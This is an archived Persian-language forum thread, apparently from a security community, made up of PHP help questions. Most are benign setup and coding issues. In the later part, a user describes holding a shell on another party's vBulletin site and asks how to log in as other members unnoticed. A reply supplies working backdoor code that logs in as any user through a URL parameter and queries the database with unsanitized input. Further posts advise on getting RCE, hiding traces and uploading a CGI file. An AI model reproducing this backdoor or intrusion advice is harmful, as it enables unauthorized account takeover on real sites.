PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : سوالات پیرامون php بخشی دیگر



mehran64
07-19-2011, 12:17 PM
سلام
من تازه کارم و تو اولین قدم اومدم WampServer2.0i نصب کردم طبق فیلم آموزشی آشیانه عمل کردم
ولی وقتی در wamp گزینه localhost رو انتخاب میکنم در firefox پیغام خطای HTTP Error 404. The requested resource is not found. رو میده و در IE هم وارد این قسمت نمیشه تا بتونم وارد server configuration یا قسمت های دیگه بشم یا اصلا متوجه بشم که نصب به درستی انجام گرفته

IIS فعال نیست ولی پورت 80 بازه سیستم عاملم سون هست

نرم افزار Xampp رو نصب کردم باز همون مشکل رو داشتم و فرقی نکرد پیغام زیر رو میداد
port 80 or 433 (SSL) already in use ! Installing Appachi2.2 server failed

الان نزدیک دو هفته است که میخوام PHP کار کنم ولی حتی نتونستم نرم افزاراش رو نصب کنم

کمک، کمک، کمک

Gerdab3x
07-19-2011, 02:20 PM
سلام دوست عزیز یه پیشنهاد ابتدا wamp رو از روی کامپیوترت حذف کن بعد این برنامه رو که در پایین لینکشو گزاشتم دانلود کن و مطمعن شو که iis غیر فعال باشه تو دسکتاپ در سون روی گوی ستارت کلیک کن منظور همون دکمه ی قدیمی توی ویندوز و iis رو سرچ کن بعد iis server management رو کلیک کن حالا شاید گزینه رو اشتباه نوشته باشم یه چیزی شبیه همینه بعذ از انتخاب این گزینه وارد پنجره جدیدی میشی بعد در سمت راست گزینه stop رو کلیک کن تا iis غیر فعال بشه تا بتونی از apache استفاده کنی اگر iis فعال باشه نمیتونی از wamp استفاده کنی و با خطا مواجه میشی بعد این برنامه رو دانلود کن که هیچ نیازی به نصب نداره می تونی اونو همراه خودت با فلش مموری حمل کنی برنامه هات رو هم در پوشه root این برنامه ذخیره کن کار باهاش خیلی راحته
[Only registered and activated users can see links]
امیدوارم که مشکلت حل شده باشه پیغامت هم به این معنیه که port 80 or 433 (SSL) already in use ! Installing Appachi2.2 server failed
پورت 80 یا 443 در حال استفاده هست و نصب apache هم با مشکل مواجه شده

mehran64
07-19-2011, 06:22 PM
مشکل اینجاست که در سیستم من IIS غیر فعاله ولی نمیدونم چرا پورت 80 در اختیاره یه چیزی هست حلا نمیدونم در اختیاره خود سون هستش یا یه نرم افزار
با نرم افزار Active ports پورتها رو نگاه کردم که عکس رو در زیر میزارم
لطفا کمک کنید

Sil3nt Di3
07-19-2011, 06:29 PM
می دونی این سوالو چندجا پرسیدی؟؟؟؟
بهتون که گفتم باید بررسی کنید که چه برنامه ای از این پورت استفاده می کنه و اینم با نرم افزارهای مانیتورینگ بررسی کنید...

mehran64
07-22-2011, 08:38 PM
فکر کنم خوده سون داره پورت 80 رو اشغال میکنه
چه کنم ؟

Sil3nt Di3
07-23-2011, 09:25 AM
نه دوست عزیز بنده دارم از همین نرم افزار در ویندوز 7 استفاده می کنم...

amsm
08-02-2011, 01:32 PM
سلام
من میخام ساعت کامپیوتر رو پرینت کنم و ارز کد زیر استفاده میکنم


print date("h:i:s");

و مینویسه 22 : 34 : 8 در حالی که کامپیوتر من ساعتش 1:29 است
اگه راه حلی دارین حتما بنویسین.:o

alir77
08-02-2011, 04:08 PM
سلام
معمولا تابع date در php زمان رو حسب گرینویچ میزنه.

شما لازمه دو کار کنید:

1. ساعت کامپیوترتون رو روی تهران تنظیم کنید (3.5+)

2. در بالای برنامه هاتون این خط کد رو اضافه کنید:


date_default_timezone_set('Asia/Tehran');

mina918
08-14-2011, 01:17 AM
با عرض سلام و خسته نباشید خدمت مدیران محترم سایت
من در مورد طراحی سایت هیچی نمی دونم. از مدیران سایت می خوام یه سورس از یه سایت رو اگه میشه به من بدیدن
مثلا سایتی مثل همین سایت آشیانه
خیلی ممنون میشیم
با تشکر


--
دوست عزیز, عنوان تاپیک ها رو درست انتخاب کنید.
عنوان تغییر کرد.

tnt_foox
08-14-2011, 01:31 AM
فكر كنم اول اگه بري تو وبلاگ ها كار كني دست جلو تر هست..........بعد قالب هاي رايگان سايت ها اكثرا تو اينترنت هست... ميتوني با يك جستو ساده بدست بياري......

mina918
08-14-2011, 01:34 AM
خیلی گشتم پیدا نکردم
میشه یه سورسی رو به ام بدین که مثل این سایت آشیانه باشه
البته کامل باشه
تمام قسمت هارو داشته باشه
با تشکر

iNJECTOR™
08-14-2011, 02:06 AM
دوست عزیز, برای شروع برنامه نویسی وب و طراحی سایت باید زبان های اولیه رو یاد بگیرید. مثل HTML - Javascript و ... .
بعد میتونید شروع به یادگیری زبان هایی مثل PHP و پایگاه های داده مثل MySQL کنید. سورس سایت آشیانه هم برای شروع ممکنه سنگین باشه برای شما, میتونید از اسکریپت های ساده تری هم شروع کنید.

mina918
08-14-2011, 02:11 AM
دوست عزیز شما لطف کنید یه سورس از سایتی که انجمن داشته باشه برام بزارید
خواهشا اگه میشه کامل باشد
لطفا یه سایت کامل که دارای ثبت نام و انجمن و ............. داشته باشه رو برام بزارین
خیلی ممنون میشم
با تشکر

abadis
08-14-2011, 02:40 AM
اگه کد نویسی بلد نیستی برو سراغ این دوتا
Vbulltin
یا
phpbb
با این دو تا به راحتی می تونی بدون کد نویسی فروم بسازی.البته برای اینکه فرومت به این قشنگی باشه باید خیلی روش کار کنیا
==========
تشکر فراموش نشه لطفا
بازم راهنمایی خواستی بگو

mina918
08-14-2011, 02:45 AM
یه سورس می خوام
البته کامل باشه
لطفا کمک کنید

iNJECTOR™
08-14-2011, 02:49 AM
یه سورس می خوام
البته کامل باشه
لطفا کمک کنید
اسکریپت های انجمن هم میتونید از vBulletin - PHPBB - MyBB و... استفاده کنید و سورسشون رو بررسی کنید تا از عملکردشون مطلع بشید. جستجو کنید تا اسکریپت مورد نظر رو پیدا کنید.

mina918
08-14-2011, 02:50 AM
شما یه سورس از یه سات که انجمن و ..... داشته باشه رو ندارین؟
اگه دارین خواهشا کمکم کنید

iNJECTOR™
08-14-2011, 02:54 AM
شما یه سورس از یه سات که انجمن و ..... داشته باشه رو ندارین؟
اگه دارین خواهشا کمکم کنید

دوست عزیز, شما جوابتون رو در پست های قبلی گرفتید و ارسال سوال تکراری اسپم محسوب میشه.
در صورت عدم داشتن سوال دیگری از پست های تکراری خودداری کنید.
PHPBB: [Only registered and activated users can see links]
MyBB: [Only registered and activated users can see links]
vBulletin: [Only registered and activated users can see links]

tanha70
08-16-2011, 02:31 PM
سلام دوستان
من wamp server 2 رو نصب کردم ولی وقتی میخوام وارد php myadmin بشم با ارور مواجه میشم
از ارورش عکس گرفتم
دوستان هر کس که میتونه کمکم کنه چون خیلی بهش نیاز دارم.
متر ترور هم به این ترتیب میباشد.

Error
MySQL said:

Cannot connect: invalid settings.
phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.
:69::69:

unique2world
08-16-2011, 05:07 PM
این بدلیل اینه که wamp در حالت آفلاین قرار داره...
روی ایکنش کلیک کنید و در حالت آنلاین قرار بدین

Sil3nt Di3
08-16-2011, 06:14 PM
به فرمایشات دوست خوبم اقا هادی اضافه کنم که این مشکل می تونه از تنظیمات سرویس هم باشه (دست خوردن ماژول و...) یا اینکه پورت سرویس mysql اشغال شده باشه توسط تروجان یا برنامه ای دیگه... هر مشکلی می تونه چندین راه داشه باشه...
این راهها رو امتحان کنید ان شاالله که حل بشه...

موفق باشید...

iNJECTOR™
08-16-2011, 06:28 PM
سلام دوستان
من wamp server 2 رو نصب کردم ولی وقتی میخوام وارد php myadmin بشم با ارور مواجه میشم
از ارورش عکس گرفتم
دوستان هر کس که میتونه کمکم کنه چون خیلی بهش نیاز دارم.
متر ترور هم به این ترتیب میباشد.

Error
MySQL said:

Cannot connect: invalid settings.
phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.
:69::69:

دوست عزیز, مطمئن بشید که سرویس mysql نصب و در حال اجرا هست.
بعد از اون مطمئن بشید که میتونید به MySQL وصل بشید و پسورد تغییر نکرده. (میتونید از اسکریپت زیر استفاده کنید.) (مشخصات رو با فایل کانفیگ phpmyadmin چک کنید.)


<?php
//Testing connection to MySQL Database
$host = "localhost"; //localhost
$user = ""; //username
$pass = ""; //password
mysql_connect($host, $user, $pass) or die(mysql_error());
?>


اگه اروری با این کد دریافت کردید اینجا قرار بدید.


این بدلیل اینه که wamp در حالت آفلاین قرار داره...
روی ایکنش کلیک کنید و در حالت آنلاین قرار بدین

دوست عزیز, حالت Offline یا Online ومپ ارتباطی به ارتباط PhpMyAdmin یا MySQL نداره.
این گزینه از دسترسی خارج از localhost به دایرکتوری ها جلوگیری میکنه و کاربر خطای 403 دریافت میکنه.

unique2world
08-17-2011, 07:43 AM
دوست عزیز, مطمئن بشید که سرویس mysql نصب و در حال اجرا هست.
بعد از اون مطمئن بشید که میتونید به mysql وصل بشید و پسورد تغییر نکرده. (میتونید از اسکریپت زیر استفاده کنید.) (مشخصات رو با فایل کانفیگ phpmyadmin چک کنید.)


<?php
//testing connection to mysql database
$host = "localhost"; //localhost
$user = ""; //username
$pass = ""; //password
mysql_connect($host, $user, $pass) or die(mysql_error());
?>


اگه اروری با این کد دریافت کردید اینجا قرار بدید.



دوست عزیز, حالت offline یا online ومپ ارتباطی به ارتباط phpmyadmin یا mysql نداره.
این گزینه از دسترسی خارج از localhost به دایرکتوری ها جلوگیری میکنه و کاربر خطای 403 دریافت میکنه.

اگه به عکسی که ایشون ضمیمه کردن دقت کنید می بینید که در حالت آفلاین قرار داره و مسلما سرویس ها غیرفعال هستند،چون اولین بار هست که اجرا شده

دقیقا این خطایی که ایشون ذکر کردن واسه خوده بنده با برقراری حالت آنلاین مرتفع شده!!!!!!!

iNJECTOR™
08-17-2011, 01:19 PM
اگه به عکسی که ایشون ضمیمه کردن دقت کنید می بینید که در حالت آفلاین قرار داره و مسلما سرویس ها غیرفعال هستند،چون اولین بار هست که اجرا شده

دقیقا این خطایی که ایشون ذکر کردن واسه خوده بنده با برقراری حالت آنلاین مرتفع شده!!!!!!!

دوست عزیز, باز هم میگم حالت آفلاین یا آنلاین ربطی به سرویس ها نداره.
همینی که دارن PhpMyAdmin رو در مرورگر میبینن یعنی اینکه سرویس ها قبلا اجرا شدن (Apache).

phpweb
09-04-2011, 02:50 AM
لطفا بگید که توابع پی اچ پی برای کار با زمانهای بسیار دقیق چی هستن؟

فرض کنید می خواید راس یه زمان مشخص که کسری از ثانیه هست یه کاری انجام بدید، از چه توابعی استفاده می کنید؟

مثلا بخواید در هر میکروثانیه یه کار خاص مثل جمع و ضرب کردن انجام بدید. در این صورت آیا پی اچ پی یه تابع مشخص ارائه داده؟

alir77
09-04-2011, 09:46 PM
بله تابع microtime هست که تایم رو برحسب یک میلیونم ثانیه! به شما میده

یه کاربرد رایج این تابه برای محاسبه زمان اجرای صفحه است.

phpweb
09-04-2011, 11:17 PM
بله تابع microtime هست که تایم رو برحسب یک میلیونم ثانیه! به شما میده

یه کاربرد رایج این تابه برای محاسبه زمان اجرای صفحه است.

این تابع رو الان استفاده می کنم.

فرض کنید بخواید توی هرثانیه، 40000 بار عمل ضرب انجام بدید. برای اینکار باید زمان رو تقسیم کنیم.
اگر تابع آماده وجود نداشته باشه کارمون کمی سخت می شه و ممکنه توابع دست سازمون هم باعث کند شدن اسکریپت بشن.

برای این کاری که من می خوام انجام بدم تابع آماده وجود نداره؟ البته منوال رو هم نگاه کردم و چیزی پیدا نکردم.

alir77
09-08-2011, 10:50 AM
این کاری که شما میخواید انجام بدید (محدود کردن تعداد یک عملیات در زمان مشخص) نه تابع آماده ای در php داره و نه توجیه منطقی.
اگر شما منظورتون چیز دیگه ای بوده و اینطور مثال زدید که لازمه دقیقا همون چیزی که نیازتونه بگید چرا که نبود تابع و کلاس در php برای کارهای ساده، معمولا نشان از فاقد منطق و توجیه بودن کاریه که شما میخواید انجام بدید.
به عبارت دیگه کاری که میخواید انجام بدید رو حتما با روشی دیگه بهتر و ساده تر میشه انجام داد.

phpweb
09-08-2011, 12:06 PM
من می خوام توی هر ثانیه رو به چند بازه زمای تقسیم کنم و توی هر بازه زمانی یه عملیات انجام بدم. فرض کنید شما هر ثانیه رو به 5 بازه تقسیم کنید و توی هر بازه زمانی یه عملیات انجام بدید.

برای این موضوف چه روشی پیشنهاد می کنید؟

alir77
09-09-2011, 07:33 AM
1. خب شما نگفتید که چرا میخواید این کار رو بکنید؟ چون به نظرم بازم دارید اشتباه میکنید که میخواید اینجوری محدود کنید.

2. اگه یکی از اون 5 تا عمل خودش 10 ثانیه طول کشید چی قراره بشه؟!

3. اگر مطمئنید اون 5 عمل خیلی سریع انجام میشه (مثل همون ضرب دو عدد!)، خب میشه از تابع میکرواسلیپ استفاده کرد:
[Only registered and activated users can see links]
مثلا:


<?php
usleep(250000);
echo '1';
usleep(250000);
echo '2';
usleep(250000);
echo '3';
usleep(250000);
echo '4';
?>

phpweb
09-09-2011, 11:05 AM
1. خب شما نگفتید که چرا میخواید این کار رو بکنید؟ چون به نظرم بازم دارید اشتباه میکنید که میخواید اینجوری محدود کنید.

2. اگه یکی از اون 5 تا عمل خودش 10 ثانیه طول کشید چی قراره بشه؟!
کار خاصی نمی خوام انجام بدم،می خوام بدونم ی اچ پی برای کارهای ظریف می شه بکار بره یا نه؟ توی جاوا اسکریپت یه اسلاید شو نوشتم که توی کمتر از یه ثانیه یه تابع رو تکرار می کنه و یه افکت به اسلاید شو می ده. می خوام بدونم که پی اچ پی برای کارهای ظریف می تونه استفاده بشه و توی یه ثانیه چندین بار یه تابع رو اجرا کنه؟

-------------------------

یه سوال در مورد جاوا اسکریپت پرسیده بودم ازتون جوابی ندادید.

alir77
09-09-2011, 09:20 PM
سمت کاربر جاوا اسکریپت میتونه زمانبندی های خاص مثل اسلایدر رو انجام بده که البته لزوما دقیق نیست (مثلا اگر سیستم عامل طرف کند باشه یا رمش پر باشه بجای یک ثانیه ممکنه ده ثانیه یه کارو طول بده!)
php و هر زبان دیگه ای هم میتونه همینطور باشه یعنی اگه اون لحظه سرور سنگین باشه (بدلیل ترافیک دیتا یا لود سی پی یو و ...)، ممکنه یه عملی مثل ضرب چند ثانیه هم طول بکشه!!!

من گفتم که این کار شما چه فایده ای داره؟ یعنی آیا «کاربرد عملی» براش سراغ دارید؟!

phpweb
09-10-2011, 01:08 AM
من گفتم که این کار شما چه فایده ای داره؟ یعنی آیا «کاربرد عملی» براش سراغ دارید؟! نه کاربرد خاصی براش ندارم.

فقط داشتم روی اسلاید شو کار می کردم که در زمان کم چندین بار استایل left رو عوض می کنه و باعث ایجاد حرکت می شه. خواستم بدونم که پی اچ پی هم چنین امکانی داره یا نه.

توی طراحی افکت برای اسلاید شو مشکل دارم، یعنی نمی دونم چطور باید یه افکت حرکت به تصاویر بدم. می خوام وقتی یه تصویر حرکت می کنه، یه تصویر دیگه زیرش قرار بدم تا پس زمینه خالی نباشه ولی نمی تونم این کارو بکنم. شما در این مورد می تونید کمک کنید؟

alir77
09-10-2011, 02:50 PM
این مورد ربطی به موضوع این تاپیک نداره.
شما میتونید در گوگل جستجو کنید و دنبال نه اسلایدشو بلکه آموزش نحوه نوشتن اسلاید شو باشید.
[Only registered and activated users can see links]

arianet
09-19-2011, 02:12 AM
با سلام

دوستان عزیز لطفا این باگ رو پچ کنید :69:


<?php
if ( isset($_GET[content])){
require("$_GET[content]");
}else{
require('view_news.php');
}
?>

وقتی این جد رو میزارم ادامه سایت آدرس شل میزنم اجرا میشه شل :69:


[Only registered and activated users can see links]

با تشکر :69:

M.R.S.CO
09-19-2011, 02:27 AM
[Only registered and activated users can see links]
بیا ایم آموزش

تشکر یادت نره

Sil3nt Di3
09-21-2011, 09:11 AM
سلام دوست عزیز

برای پچ این باگ شما باید ورودی ها رو کنترل کنید که کاربر نتونه ورودی های خودش رو وارد کنه:



<?php
$input = strip_tags($_GET[content]);
$input = htmlspecialchars($_GET[content]);
if ( isset($input) && file_exists($input) ){
require("$input");
}else{
require('view_news.php');
}
?>

موفق باشید

phpweb
09-29-2011, 05:50 PM
من یه کتاب انگلیسی در مورد curl خوندم و تقریبا ساده بود اما نتونستم دقیقا کاربرد این چهار آپشن رو متوجه بشم.

اگر امکانش هست لطفا در مورد این 4 آپشن توضیح بدید.


1- curlopt_cookiefile

2- curlopt_cookiejar

3- curlopt_header

4- curlopt_verbose

behzad_vb.net
10-12-2011, 02:51 PM
سلام به ههه استادان عزیز خودم من میخوام بیتونم با php دست داخل جوملا برده و ماژول بنویسم و بتونم با جوملا ارتباط برقرار کنم و تغییرش بدم چگونه php را ابد بگیرم شما چه پیشنهادی به من میکنید کجای php را باید یاد بگیرم و تا چه هدی ممنون

Sil3nt Di3
10-13-2011, 10:21 AM
سلام دوست عزیز
کاش این سوال رو در بخش سوال و جواب مطرح کرده بودید
برای اینکه بتونید کامپوننت جوملا بنویسید و کارای دیگه بکنید باید php در حد متوسط بلد باشید... هسته جوملا رو بخوبی بشناسید و نحوه کامپوننت نوشتن هم بلد باشید...
و همه مهمتر باید کلاس نویسی رو هم حرفه ای بلد باشید... چون جوملا ساختارش کلاسه...

موفق باشید....

adc
11-06-2011, 11:58 PM
سلام من الان یک اسکرپت دارم که درون آن کلمات به این شکل هستند ظٹظƒطھظ…ظ„ ط¨ط¹ ولی به درستی اجرا می شوند ولی بدی این حالت این هست که در ترجمهمشکل به وجود می یاید و نمی دونی هر چیز ماله کجا هست حالا خواهش می کنم هر کی می تونه من را کمک کنه که این کلمات را از این حالت در بیارم:98::88:

Kaz3m
11-07-2011, 12:42 AM
با سلام دوست عزیز


منظوره شما Encoding هست که بهم ریخته ؟ Encoding برای کلمات فارسی باید UTF-8 باشه

adc
11-07-2011, 08:47 AM
نگاه کنید این فایل قبل از دی کد ioncube بوده ولی الان decode شده ولی دیگه کلمات فارسیش خراب هست حالا چی شکلی می شه کلمات فارسی را نیز درست کرد؟؟؟

Sil3nt Di3
11-08-2011, 11:19 AM
شما باید نوع کدگذاری برای نمایش کاراکترها رو بدونید که ممکنه برنامه نویس بغیر از utf8 چیز دیگه ای گذاشته باشه...
یا ممکن هست دیکدر با کاراکترهای فارسی مشکل داشته باشه که من بعید می دونم اما بهرحال هرچیزی ممکنه!

LORD SaeeD
11-08-2011, 10:46 PM
با سلام.لطفا دوستان زحمت بکشن این کد زیر رو برام دیکد کنند ممنون میشم.براتون با دو فرمت zip , txt گذاشتم.فقط شرمنده عجله دارم
پیشاپیش تشکر:100:

sattar2111
11-13-2011, 03:11 PM
با سلام
من این سوال را یه بار دیگر هم پرسیدم و دو تا از دوستان هم جواب هایی دادن ولی تاپیک قبلی پاک شده ! حالا چرا ! نمیدونم !!!
ایمیل هم زدم کسی جواب نداد منم گفتم دوباره بپرسم.
سوال: من از یه سایتی شل دارم ولی قصدم دیفیس نیست می خواهم به جای یکی از یوزر ها وارد سایت بشم در ضمن فایل config.php قابل خواندن نیست که بخواهم از دیتابیس وارد شوم و تغییر پس و از این حرفا.
من می خواهم بدونم ایا میشه با تغییر فایل login.php کاری کرد که مثلا پسورد چک نشه؟ یا در قسمت فراموش کردن رمز کاری کرد که درستی ایمیل چک نشه؟
البته من فکر می کنم شدنی باشه مثلا با تغییر == به ==! یا یه کاری شبیه این. (البته من php بلد نیستم و فقط نظرم را گفتم اگه دوستان فکر می کنن شدنی نیست که بگن و اگر هم فکر می کنن شدنی هست که راهنمایی کنن)
login.php را پیوست کردم و در ضمن قسمت مربوط به لوگین را اینجا قرار دادم.

// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST['do'] == 'login')
{
$vbulletin->input->clean_array_gpc('p', array(
'vb_login_username' => TYPE_STR,
'vb_login_password' => TYPE_STR,
'vb_login_md5password' => TYPE_STR,
'vb_login_md5password_utf' => TYPE_STR,
'postvars' => TYPE_BINARY,
'cookieuser' => TYPE_BOOL,
'logintype' => TYPE_STR,
'cssprefs' => TYPE_STR,
'inlineverify' => TYPE_BOOL,
));

// can the user login?
$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);

if ($vbulletin->GPC['vb_login_username'] == '')
{
eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
}

// make sure our user info stays as whoever we were (for example, we might be logged in via cookies already)
$original_userinfo = $vbulletin->userinfo;

if (!verify_authentication($vbulletin->GPC['vb_login_username'], $vbulletin->GPC['vb_login_password'], $vbulletin->GPC['vb_login_md5password'], $vbulletin->GPC['vb_login_md5password_utf'], $vbulletin->GPC['cookieuser'], true))
{
($hook = vBulletinHook::fetch_hook('login_failure')) ? eval($hook) : false;

// check password
exec_strike_user($vbulletin->userinfo['username']);

if ($vbulletin->GPC['logintype'] === 'cplogin' OR $vbulletin->GPC['logintype'] === 'modcplogin')
{
// log this error if attempting to access the control panel
require_once(DIR . '/includes/functions_log_error.php');
log_vbulletin_error($vbulletin->GPC['vb_login_username'], 'security');
}
$vbulletin->userinfo = $original_userinfo;

// For vB_API we need to unlogin the users we logged in before
if (defined('VB_API') AND VB_API === true)
{
$vbulletin->session->set('userid', 0);
$vbulletin->session->set('loggedin', 0);
}

if ($vbulletin->GPC['inlineverify'] AND $vbulletin->userinfo)
{
require_once(DIR . '/includes/modfunctions.php');
show_inline_mod_login(true);
}
else
{
define('VB_ERROR_PERMISSION', true);
$show['useurl'] = true;
$show['specificerror'] = true;
$url = $vbulletin->url;
if ($vbulletin->options['usestrikesystem'])
{
eval(standard_error(fetch_error('badlogin_strikes_ passthru', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
}
else
{
eval(standard_error(fetch_error('badlogin_passthru ', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'])));
}
}
}

exec_unstrike_user($vbulletin->GPC['vb_login_username']);

// create new session
process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);

// do redirect
do_login_redirect();

}
else if ($_GET['do'] == 'login')
{
// add consistency with previous behavior
exec_header_redirect(fetch_seo_url('forumhome|**** ssion', array()));
}
با تشکر فراوان.

THe-EnD
11-13-2011, 03:26 PM
یه فکر جالب دارم شاید عملیبشه
از لوگین پیج یه فک پیج بساز
چطوره؟
اگه سرچ کنی اموزش ساختش هست

sattar2111
11-13-2011, 03:32 PM
درود
نه جیگر این جور صفحه ها یا با یه ادرس دیگه هست یا اینکه من باید با شل روی خود سایت اپلود کنم که برای بقیه موقع ورود به سایت مشکل پیش میاد و ادمین میفهمه. در ضمن شاید اون یارو تا یه هفته دیگه نخواد بیاد توی سایت.

Sil3nt Di3
11-13-2011, 04:18 PM
با سلام
شما می تونید از vb back door استفاده کنید...

موفق باشید...

sattar2111
11-13-2011, 05:00 PM
اگر منظورتون از چیزی که فرمودید بک دور با شل هست باید بگم که سیف مود روشنه (من خاموش میکنم ولی اخر کار دوباره روشن می کنم که ادمین متوجه نشه. شل را هم پاک می کنم و تمام تغییرات .htaccess را هم مثل قبل می کنم) فایروال هم داره ولی من کار خاصی ازش ندیدم حتی ورود و خروج و ساخت فایل و پاک کردن ان را هم توی لوگش نمیاره من نمی دونم به چه دردی می خوره و در ضمن مشکل ای پی هم هست
البته من متوجه نشدم که بک دور به چه دردم می خوره؟! بک دور مگه فقط یه راه برای نفوذ به سایت و سرور برای اپلود دوباره شل نیست؟ (مثلا برای اینکه اگر شل را پاک کردن و باگ را پچ کردن هنوز یه راه دیگه برای هکر باقی بمونه؟!)
شاید هم منظور شما از vb back door چیز دیگه ای هست اگر جواب مثبت است خوشحال میشم راهنمایی کنید.
در ضمن در مورد سوالم یه راهنمایی می خواستم :
می خواستم بدونم وقتی شرط درست باشه کدام قسمت از فرمان اجرا میشه؟ این قسمت؟

exec_header_redirect($vbulletin->options['forumhome'] . '.php');
خوب اگه جواب بالا مثبت باشه و من بیام کد را این شکلی تغییر بدم چه اتفاقی میفته
فقط نخندیا
هیچی php بلد نیستم

// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST['do'] == 'login')
{
$vbulletin->input->clean_array_gpc('p', array(
'vb_login_username' => TYPE_STR,
'postvars' => TYPE_BINARY,
'cookieuser' => TYPE_BOOL,
'logintype' => TYPE_STR,
'cssprefs' => TYPE_STR,
));

// can the user login?
$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);

// add consistency with previous behavior
exec_header_redirect($vbulletin->options['forumhome'] . '.php');
}

myeldorado
11-14-2011, 10:55 AM
با سلام
من یه صفحه طراحی کردم که کاربران سایت، لینک ویدئو های فیس بوک رو توی تکست باکس وارد می کنن و من اونا رو توی دیتابیس ذخیره می کنم.
حالا دنبال اسکریپت یا پلیری هستم که بتونم با استفاده از این لینک، ویدئو رو توی سایت خودم play کنم (البته برای ایران نمی خوام (چون فیلتره :77: ) آیا میشه این کار رو کرد؟
از دوستانی که اطلاعاتی در این زمینه دارن ممنون می شم کمک کنن و لینک آموزشی یا لینک نمونه ی کار شده با ویدئو های فیس بوک رو برام بذارن
با تشکر

portocol
11-14-2011, 11:17 AM
به اين سايت مراجعه كن مشكلت حل مي شه

[Only registered and activated users can see links]

Sil3nt Di3
11-14-2011, 12:24 PM
سلام دوست عزیز...

این کد رو کپی کن در قسمت مربوطه و در اخر ادرس اینو اضاف کن : ?bd


<?php

if (isset($_GET['bd']))
{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'");
if (!$vbulletin->userinfo['userid']) die("Invalid username!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['bd']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}

?>

موفق باشید...

sattar2111
11-14-2011, 02:14 PM
ای لعنت به این شانس
راه ورودم را بستن
تبدیل به RCE میکردم و میرفتم حالشا می بردم حالا تبدیل میشه ولی فقط دوتا دستور id و pwd اجرا میشه دیگه هیچ دستوری اجرا نمیشه حتی ls هم اجرا نمیشه
اگر موفق شدم شل بگیرم از چیزی که شما فرمودید استفاده می کنم همین جا نتیجه را میگم.
موفق باشید

Sil3nt Di3
11-14-2011, 05:25 PM
سعی کنید یک فایل cgi اپلود کنید...

adc
11-24-2011, 03:20 PM
سلام در cronjob چی شکلی می شه یک فایل php موجد در public_html سایت را هر ۶ ساعت اجرا کرد؟؟؟

مثلا می خوام ایندکس سایتم هر ۶ ساعت اجرا بشه

alir77
11-24-2011, 04:14 PM
پس از تنظیم ساعت در قسمت کرانجاب، دستور زیر رو بده اجرا کنه:


wget [Only registered and activated users can see links]

و بجای php-jquery.ir آدرس سایتت رو بده.

noblea&a
12-02-2011, 09:59 AM
سلام
من 1 متغیر تو صفحه register.php گذاشتم
]چطور میتونم تو صفحه index.php ازش استفاده کنم؟

Gerdab3x
12-02-2011, 10:11 AM
اول باید متغیرتو به صفحه index ارسال کنی و بعد از اون استفاده کنی مثلا تو این مثال من وقتی روی یه دکمه کلیک می کنم یه متغیر رو ارسال میکنم و بعد اون رو چاپ میکنم
<?php
//صفحه رجیستر
<form method="post" action="index.php">
<input type="text" name="name" value="">
<input type="submit" value="ارسال">
</form>
?>
<?php
//صفحه ایندکس
$name=$_POST['name'];
echo $name;
?>

noblea&a
12-02-2011, 10:26 AM
اول باید متغیرتو به صفحه index ارسال کنی و بعد از اون استفاده کنی مثلا تو این مثال من وقتی روی یه دکمه کلیک می کنم یه متغیر رو ارسال میکنم و بعد اون رو چاپ میکنم
<?php
//صفحه رجیستر
<form method="post" action="index.php">
<input type="text" name="name" value="">
<input type="submit" value="ارسال">
</form>
?>
<?php
//صفحه ایندکس
$name=$_POST['name'];
echo $name;
?>

فقط صفحه ایندکسشو متوجه نمیشم
$name=$_POST['name'];
یعنی چی

mortezasaeedy
12-02-2011, 11:15 AM
سلام
من تازه php شروع كردم
فكر كنم اينجوري بشه:
تو صفحه register كه همون كداي دوست گلم Gerdab3x عاليه
اما تو قسمت php و صفحه ايندكس :
شما مقدار name رو برابر با name قرار دادي پس در يافتشم بايد به همين طريق باشه
sam=$_POST["name"]; s$(حرف s فقط واسه مرتب شدن كد هست ) كه من الان $sam رو با متد post (كه باحرف بزرگ هست به
اين صورت $_POST)مقدار دهي كردم و اون رو برابر مقدار پست شده از صفحه قبل قرار دادم :)
باي . . .

sajjad13and11
12-02-2011, 01:48 PM
سلام دوستان اشيانه
واسه امنيت اسكريپ و كد گذاريش چيكار كنم من؟ zend راحت ديكد ميشه اگه ميشه يه چيزي باشه كه ديكد نشه يا امكانش خيلي كم باشه
لطفا كمك كنيد خيلي برام مهمه

Sil3nt Di3
12-02-2011, 01:52 PM
سلام دوست عزیز

برای استفاده از یک متغیر که در یک صفحه دیگر قرار دارد ابتدا باید اون صفحه فراخوانی بشه تا بتونی از تمامی متغیر ها و تابع اون استفاده کنی

برای فراخوانی هم می تونی از توابع require یا include استفاده کنی

موفق باشی...

noblea&a
12-02-2011, 02:42 PM
من 1 صفحه دارم
می خوام وقتی صفحه باز میشه 1 مقداری به صورت اتونامبر در textfield قرار بگیره
لطفا راهنمایی کنید:69:

Goback
12-02-2011, 04:00 PM
یه همچین چیزی باید بنویسید:


<?php
$result = mysql_fetch_array(mysql_query('SELECT `my_number_field` from `mytable` where mycondition'));
$result[0]=$result[0]+1;
